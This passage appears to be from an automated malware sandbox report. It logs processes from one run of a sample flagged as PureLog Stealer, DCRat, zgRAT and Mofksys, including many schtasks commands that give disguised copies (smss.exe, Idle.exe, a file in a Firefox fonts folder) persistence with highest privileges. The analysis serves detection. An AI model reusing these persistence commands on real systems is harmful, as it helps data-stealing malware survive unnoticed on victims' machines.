                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\containerReview.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\blockcomSession/containerReview.exe"
                                                                                                                                                          Imagebase:0xd80000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000000.1826039246.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000002.1829239210.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                                                                                                                                          Imagebase:0x7ff6705d0000
                                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                                                                                                                                          Imagebase:0x7ff7dc3b0000
                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:30
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:31
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:32
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                                          Imagebase:0x2d0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          • Detection: 77%, Virustotal, Browse
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:33
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:34
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          • Detection: 77%, Virustotal, Browse
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:35
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:36
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\Idle.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\Idle.exe
                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:37
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\Idle.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\Idle.exe
                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:38
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:39
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\smss.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\smss.exe
                                                                                                                                                          Imagebase:0xc00000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:40
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:41
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\smss.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\smss.exe
                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:42
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:6.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                            Signature Coverage:8.5%
                                                                                                                                                            Total number of Nodes:1667
                                                                                                                                                            Total number of Limit Nodes:45
